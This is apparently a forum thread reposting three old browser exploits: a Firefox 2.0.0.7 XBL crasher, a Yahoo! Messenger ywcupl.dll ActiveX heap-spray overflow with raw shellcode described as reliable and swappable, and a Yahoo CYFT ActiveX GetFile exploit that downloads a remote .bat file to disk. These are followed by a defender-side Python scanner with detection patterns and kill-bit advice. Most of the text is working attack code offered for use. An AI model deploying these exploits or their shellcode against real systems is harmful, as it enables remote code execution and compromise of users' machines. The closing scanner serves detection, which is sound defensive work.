puskin

YMess and Mozilla 2.X.X.X crasher exploit



##################################################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Solution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in a different way. Although it doesn't crash 2.0.0.8, it causes the HTML code not to be shown when viewing source in Mozilla Firefox 2.0.0.8, and that is another bug on 2.0.0.8!
# Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm
#
######################### WwW.AmnPardaz.com ########################
#
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
#
######################## Bug Description ###########################
#
# To do this we need 2 files (HTML, XML).
# Their code is given below.
#
# Save the code below in an HTML file.
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<html>
<head>
<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
</head>
<body>
Suddenly see you baby! If you see this bug execution was failed!
<script>
alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir')
</script>
</body>
</html>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Save the code below in a file named "moz.xml".
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="xss">
<implementation>
<constructor><![CDATA[
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));
]]></constructor>
</implementation>
</binding>
</bindings>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Now, opening the HTML file in Mozilla Firefox <= 2.0.0.7 crashes the browser, and in Mozilla Firefox 2.0.0.8 no code is shown when viewing the source.
#
###################################################################



Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit


<html>
<!--
45 minutes of fuzzing!
Great results! very reliable, runs calc.exe, replace with shellcode of your choice!!!

link: http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
maybe more vulz!

Greetz to: str0ke and shinnai!
-->
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
<script>
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<800; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.initialize();
target.send();
</script>
</html>


Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download


-----------------------------------------------------------------------------
Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download
url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will not be responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

Marked as:
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False

From remote: depends on Internet Explorer settings
From local: yes

Description:
This control contains a "GetFile()" method which allows downloading, to the
user's PC, an arbitrary file passed as argument.
Remote execution depends on Internet Explorer settings; local execution
works very well.

greetz to: skyhole (or YAG KOHHA) for inspiration
-----------------------------------------------------------------------------
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
MsgBox "Exploit completed"
End Sub
</script>

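The three pages in this thread share a handful of traits a defender can key on: a CSS `-moz-binding` pulling an XBL file, `eval(unescape(...))`, a `%u9090` NOP sled followed by a long run of `%uXXXX` escapes, a string-doubling loop and a large array fill (the heap spray), and an `<object classid='clsid:...'>` for a specific control. The Python below is an added, defender-side example written for this thread; it is not code from any of the advisories or their authors. The two CLSIDs are taken from the posts above; the regexes, score weights and verdict thresholds are my own assumptions for illustration, and the sample pages are constructed to mirror the posts' structure with the shellcode bytes replaced by a harmless repeated placeholder.

```python
"""
Heuristic indicator scan for saved HTML/XML pages resembling the three posts
in this thread. Added example; not the advisories' own code. CLSIDs come from
the posts; regexes, weights and thresholds are assumptions for illustration.
"""
import re
from dataclasses import dataclass, field

# CLSIDs quoted in the posts above, mapped to the control they identify.
KNOWN_BAD_CLSIDS = {
    "DCE2F8B1-A520-11D4-8FD0-00D0B7730277": "Yahoo! Messenger ywcupl.dll (send() overflow)",
    "24F3EAD6-8B87-4C1A-97DA-71C126BDA08F": "Yahoo! Messenger CYFT ft60.dll (GetFile download)",
}

CLSID_RE = re.compile(
    r"clsid:\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
MOZ_BINDING_RE = re.compile(r"-moz-binding\s*:\s*url\(", re.I)
EVAL_UNESCAPE_RE = re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)
NOP_SLED_RE = re.compile(r"(?:%u9090){2,}", re.I)      # 0x90 = x86 NOP
PERCENT_U_RE = re.compile(r"%u[0-9A-F]{4}", re.I)
# "x += x" or "x = x + x": the block-doubling loop that builds spray blocks
DOUBLING_RE = re.compile(r"\b(\w+)\s*\+=\s*\1\b|\b(\w+)\s*=\s*\2\s*\+\s*\2\b")
# "for (...; i < N; ...) arr[i] =": filling a large array with copies
ARRAY_FILL_RE = re.compile(
    r"for\s*\([^)]*<\s*(\d+)[^)]*\)\s*\w+\s*\[\s*\w+\s*\]\s*=", re.I)


@dataclass
class ScanResult:
    score: int = 0
    findings: list = field(default_factory=list)


def scan_page(text):
    """Score one document and list which indicators fired."""
    result = ScanResult()

    def hit(points, message):
        result.score += points
        result.findings.append(message)

    for match in CLSID_RE.finditer(text):
        clsid = match.group(1).upper()
        known = KNOWN_BAD_CLSIDS.get(clsid)
        if known:
            hit(5, f"known vulnerable ActiveX control {clsid}: {known}")
        else:
            hit(1, f"ActiveX instantiation of {clsid}")
    if MOZ_BINDING_RE.search(text):
        hit(3, "-moz-binding pulls an XBL binding from CSS")
    if EVAL_UNESCAPE_RE.search(text):
        hit(2, "eval(unescape(...)) obfuscated script")
    if NOP_SLED_RE.search(text):
        hit(4, "%u9090 NOP sled")
    escapes = len(PERCENT_U_RE.findall(text))
    if escapes >= 32:
        hit(3, f"{escapes} %uXXXX escapes (shellcode-sized blob)")
    if DOUBLING_RE.search(text):
        hit(2, "string-doubling loop (spray block construction)")
    fill = ARRAY_FILL_RE.search(text)
    if fill and int(fill.group(1)) >= 100:
        hit(3, f"array fill of {fill.group(1)} blocks (heap spray)")
    return result


def verdict(result):
    """Assumed thresholds: 8+ worth blocking/alerting, 3-7 worth a look."""
    if result.score >= 8:
        return "malicious"
    if result.score >= 3:
        return "suspicious"
    return "clean"


# Constructed samples mirroring the posts' structure; the payload bytes are
# replaced with a harmless repeated placeholder, so no real shellcode here.
SAMPLE_SPRAY = (
    "<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>\n"
    "<script>\n"
    'shellcode = unescape("%u9090%u9090%u9090' + "%u4141" * 40 + '");\n'
    'bigblock = unescape("%u9090%u9090");\n'
    "while (bigblock.length<slackspace) bigblock+=bigblock;\n"
    "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n"
    "for (x=0; x<800; x++) memory[x] = block + shellcode;\n"
    "target.server = buffer; target.initialize(); target.send();\n"
    "</script>\n"
)
# The Firefox crasher: the HTML and the fetched moz.xml, scanned together.
SAMPLE_XBL = (
    '<style>BODY{-moz-binding:url("moz.xml#xss")}</style>\n'
    "<constructor><![CDATA[ eval(unescape('%64%6f')); ]]></constructor>\n"
)
SAMPLE_BENIGN = "<html><body><script>var total = 0; total += 5;</script></body></html>"

if __name__ == "__main__":
    for name, page in [("spray", SAMPLE_SPRAY), ("xbl", SAMPLE_XBL),
                       ("benign", SAMPLE_BENIGN)]:
        r = scan_page(page)
        print(f"{name}: {verdict(r)} (score {r.score})")
        for finding in r.findings:
            print("  -", finding)
```

The CLSID table is the part worth maintaining: the same list doubles as the input for kill-bitting the controls on a Windows fleet (the CYFT post itself reports KillBitSet: False), which is done by setting the `Compatibility Flags` DWORD to 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`. The string and loop heuristics are deliberately loose, so treat the score as a triage aid for saved pages or proxy logs rather than a blocking rule on its own.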

I guess I'd ruin all your fun if I told you to edit your own post every time you want to add something here, wouldn't I?

edit: replace the word "fun" with "progress toward V.I.P" (or RIP)

sorry man.... I got a bit carried away.. next time I won't make so much noise :P, all the best!
